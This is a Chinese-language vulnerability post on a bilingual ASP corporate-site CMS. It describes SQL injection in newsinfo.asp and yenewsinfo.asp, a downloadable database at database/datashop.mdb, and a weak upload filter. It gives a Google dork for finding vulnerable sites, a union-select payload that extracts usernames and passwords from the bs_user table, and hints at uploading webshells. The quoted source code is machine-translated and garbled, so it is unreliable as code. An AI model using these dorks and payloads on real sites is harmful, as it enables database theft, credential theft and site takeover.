博西公司企业网站管理系统注入上传漏洞

博西公司企业网站管理系统注入上传漏洞
点评:博西公司网站管理系统中英文双语版,同时在同一页面的后台管理,在修改后的数据加上汉语和英语的内容。该网站的左栏有模块,可以添加到删除自由,不修改代码。

不知道如何写网页的人也可以有自己的网站。它们的基本数据添加在后台管理中。网站的标题、地址、版权、公司的邮局、收集和其他信息可以在公司数据的背景下进行管理。
----------------------------------------------------
漏洞1:注入漏洞,
newsinfo.asp漏洞页面,
漏洞代码:如果不是空的(request.querystring(ID))然后
ID = request.querystring(ID)
其他的
ID = 1
最后如果
集= server.createobject(ADODB。记录集)
,打开选择*从共讯id是ID,Conn,3
记录访问次数
RS(计数器)= RS(计数器)+ 1
rs.update
nCounter = RS(反)
id变量不直接进入sql查询处理,可用于注入,d
第二页:yenewsinfo.asp
错误:<代码
如果不是空的(request.querystring(ID))然后
ID = request.querystring(ID)
其他的
ID = 1
最后如果
集= server.createobject(ADODB。记录集)
,打开选择*从yenews id是ID,Conn,3
记录访问次数
RS(计数器)= RS(计数器)+ 1
rs.update
nCounter = RS(反)
内容的定义
内容= ubbcode(RS(内容))
%>
原理相同,可以注射。
漏洞二:数据库下载漏洞
数据库:数据库/ datashop.mdb地址
若要设置下载表,可以随时下载!
漏洞三:上载漏洞
upfile.asp,upfilea.asp漏洞页面:
问题代码:fileext = 1例(文件。fileext)
上传=分裂(upfiletype,| )
我= 0,UBound(上传)
如果fileext =装饰(上传(我))然后
enableupload =真
退出
最后如果
下一个
如果fileext =ASP或fileext =ASA或fileext =ASPX然后
enableupload = false
最后如果
如果enableupload = FALSE然后
不允许上传此类型的文件!只允许这些类型的文件上传:upfiletype
founderr =真
最后如果
这就像上传的bug一样好。我不知道是谁复制了代码。注册用户本地上传PHP的大马或添加空间来过滤和上传ASP马来西亚。我不会告诉你具体的方法,不要再说了!
漏洞利用:注射,谷歌:inurl: yenewsinfo.aspid
注:% 20and声明% 201 = 2% 20union % 20select % 201,用户名密码20from 20bs_user 3、4 % %
或:你需要手动添加表格:bs_user

数据库漏洞利用:
挖掘机:关键词:inurl: yenewsinfo.aspid
后缀:数据库/ datashop.mdb

我不演示上传漏洞的使用,也可以参考好企业网站管理系统的漏洞。
免责声明:本网信息来自于互联网,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。
相关文章
返回顶部